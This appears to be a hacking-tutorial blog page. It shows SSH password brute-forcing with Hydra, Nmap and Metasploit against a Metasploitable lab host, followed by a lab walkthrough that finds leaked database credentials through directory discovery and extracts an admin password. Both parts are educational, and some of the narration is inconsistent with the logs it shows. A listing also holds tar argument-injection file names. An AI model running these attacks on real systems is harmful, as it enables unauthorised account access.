  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                   

We are going to use wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt


Now, use the Hydra tool to launch the attack.



Command

hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

-l
Login with a single username

-P
Load several passwords from the list

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
[DATA] attacking ssh://192.168.6.45:22/
[22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                            

The password for the msfadmin user is msfadmin.

Using Nmap Script


We will run ssh-brute Nmap script to find the password of the "administrator" user.

Password List to be used bydefault via nmap

/usr/share/john/password.lst


/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

ssh-brute script

ssh-brute.nse is a Nmap script used to launch dictionary attacks on the SSH service.

This script takes a username and password list files. This is useful when the target username is not known to the attacker. However, in this case, we are already aware of the username i.e. "administrator". So, we will create a new file containing only this username.


Command


echo "msfadmin" > users1.txt

NOTE- msfadmin is our username



The password list is "/usr/share/nmap/nselib/data/passwords.lst".

We can now run the script,


Command

nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
[sudo] password for hackerboy: 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
NSE: [ssh-brute] Trying username/password pair: msfadmin:
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
Nmap scan report for 192.168.6.45
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     msfadmin:msfadmin - Valid credentials
|_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The password of the "msfadmin" user is msfadmin

Using Metasploit

We can use

auxiliary/scanner/ssh/ssh_login

auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

ssh_login module

It is an auxiliary scanner module for ssh service in Metasploit. It also pops up an SSH shell on success.


Start msfconsole in quite mode using
-q
option


Command

msfconsole -q

Use the auxiliary/scanner/ssh/ssh_login module and set all required target details i.e RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose etc.



Password List

/usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Command

use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
set STOP_ON_SUCCESS true
set verbose true
exploit



RHOSTS
: Target IP address

USERPASS_FILE
: Custom Username and Password file i.e user:pass


STOP_ON_SUCCESS
: If set to
true

-the operation stops after finding the working credentials


verbose
: If set to
true

-operation logs will be shown on console 

userpass.txt

msf6 >
msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > 


msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
RHOSTS => 192.168.6.45
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

[*] 192.168.6.45:22 - Starting bruteforce
[-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
[-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
[+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > 

The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

Command

sessions

msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                                Connection
  --  ----  ----         -----------                                ----------
  1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
  2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)

msf6 auxiliary(scanner/ssh/ssh_login) > 

Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

We can use the credentials to access the target machine using the SSH command.

SSH to the target machine using the credentials of user "root".

Command

ssh msfadmin@192.168.6.45
<yes>
<attack>
id
whoami
ls -la


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                             130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
    ~/.ssh/known_hosts:80: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
msfadmin@192.168.6.45's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Fri Dec 24 09:17:35 2021
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$       
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ls -la
total 68
drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
-rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
-rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
-rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
-rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
-rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
-rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
-rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
msfadmin@metasploitable:~$ 

This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

 

Representation

You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.

Objective

The Objectives of this our moto is to first find the web servers in the network that you are directly attached with this. Then to test the Web Application running on it in order to check if you can access restricted areas (such as the login page)!

Tools

The best tools for this lab are -

# Dirbuster
# mysql
# Web browser

Follow the Step -

1) Find all the machines in the network

2) Identify the machines role

3) Explore the web application

4) Find hidden files

5) Test the credentials found

6) Retrieve the correct admin password

Solutions steps

Find all the machines in the network

We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig           
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12329  bytes 1183972 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12329  bytes 1183972 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
        ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
        RX packets 4679  bytes 256538 (250.5 KiB)
        RX errors 0  dropped 2  overruns 0  frame 0
        TX packets 5763  bytes 321536 (314.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
        inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 95039  bytes 105443523 (100.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 56428  bytes 9346057 (8.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 10.104.11.0/24. Let's run nmap with -sn option order to discover all the available hosts on the network.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 10.104.11.0/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
Nmap scan report for 10.104.11.96
Host is up (0.61s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.198
Host is up (0.64s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.50
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous command shows that there are only two hosts alive in the network: 10.104.11.96 and 0.104.11.198

Identify the machines role

Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sV 10.104.11.96,198
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
Nmap scan report for 10.104.11.96
Host is up (0.85s latency).                                                         
Not shown: 998 closed tcp ports (reset)                                        
PORT   STATE SERVICE VERSION                                       
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:03:17 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.91s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:F5:80 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$ 

From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL.

Since the scope of the engagement is to check if an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.

Explore the web application

In order to inspect the web application we just need to type the IP address of the target machine into our browser.

If we inspect the web application, we can see that the \"Sign up\" page is not available, meaning that we cannot create a new user in order to access the restricted area.

Moreover, we do not have any valid credential to use and the form seems not vulnerable to any SQL injection attack.

Find hidden files

Since we do not want to bruteforce the login form, we can try to run discovery tools such as dirbuster in order to find hidden files that may help us with our goal.

Let us start dirbuster and run a scan using the directory-list-2.3.-small.txt file. After a minute or two, we should start getting some interesting results:

Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it:

As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$                                                                                                                             

>

Unfortunately, it seems that the credentials are not valid. Let us keep investigating the files found with dirbuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application:

This is even better than the previous file found!

Test the credentials found

Let us try the credentials found in the signup.php file and see if we are able to access the DB!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$                                                        130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198               130 ⨯
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 241
Server version: 5.5.38-0+wheezy1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

As we can see, this time we are successfully logged into the database! Let us inspect it!

Retrieve the correct admin password

Let us use some simple mysql commands to navigate the database and check if there is anything interesting in it. First, we will have to select the database to use and then inspect its tables and data, as follows:

MySQL [(none)]> use awdmgmt_accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts                   |
+----------------------------+
1 row in set (0.528 sec)

MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email              | password | displayname |
+----+--------------------+----------+-------------+
|  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
+----+--------------------+----------+-------------+
1 row in set (0.898 sec)

MySQL [awdmgmt_accounts]> 

With the information just obtained, let us try to log into the web application:

Disclaimer